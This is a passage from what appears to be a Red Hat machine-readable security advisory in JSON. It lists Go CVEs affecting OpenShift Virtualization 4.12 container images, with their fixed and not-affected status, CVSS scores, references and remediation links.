"8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2022-29526" }, { "category": "external", "summary": "RHBZ#2084085", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2084085" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2022-29526", "url": "https://www.cve.org/CVERecord?id=CVE-2022-29526" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2022-29526", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-29526" }, { "category": "external", "summary": "https://groups.google.com/g/golang-announce/c/Y5qrqw_lWdU", "url": "https://groups.google.com/g/golang-announce/c/Y5qrqw_lWdU" } ], "release_date": "2022-05-11T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2023-01-25T11:11:29+00:00", "details": "Before applying this update, you must apply all previously released errata\nrelevant to your system.\n\nTo apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2023:0408" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 6.2, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "products": [ "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "golang: syscall: faccessat checks wrong group" }, { "cve": "CVE-2022-30629", "cwe": { "id": "CWE-331", "name": "Insufficient Entropy" }, "discovery_date": "2022-06-02T00:00:00+00:00", "flags": [ { "label": "vulnerable_code_not_present", "product_ids": [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64" ] } ], "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2092793" } ], "notes": [ { "category": "description", "text": "A flaw was found in the crypto/tls golang package. When session tickets are generated by crypto/tls, it is missing the ticket expiration. This issue may allow an attacker to observe the TLS handshakes to correlate successive connections during session resumption.", "title": "Vulnerability description" }, { "category": "summary", "text": "golang: crypto/tls: session tickets lack random ticket_age_add", "title": "Vulnerability summary" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64" ], "known_not_affected": [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2022-30629" }, { "category": "external", "summary": "RHBZ#2092793", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2092793" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2022-30629", "url": "https://www.cve.org/CVERecord?id=CVE-2022-30629" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2022-30629", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-30629" }, { "category": "external", "summary": "https://groups.google.com/g/golang-announce/c/TzIC9-t8Ytg", "url": "https://groups.google.com/g/golang-announce/c/TzIC9-t8Ytg" } ], "release_date": "2022-06-02T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2023-01-25T11:11:29+00:00", "details": "Before applying this update, you must apply all previously released errata\nrelevant to your system.\n\nTo apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2023:0408" } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 3.1, "baseSeverity": "LOW", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N", "version": "3.1" }, "products": [ "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64" ] } ], "threats": [ { "category": "impact", "details": "Low" } ], "title": "golang: crypto/tls: session tickets lack random ticket_age_add" }, { "cve": "CVE-2022-30630", "cwe": { "id": "CWE-1325", "name": "Improperly Controlled Sequential Memory Allocation" }, "discovery_date": "2022-07-14T00:00:00+00:00", "flags": [ { "label": "vulnerable_code_not_present", "product_ids": [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", 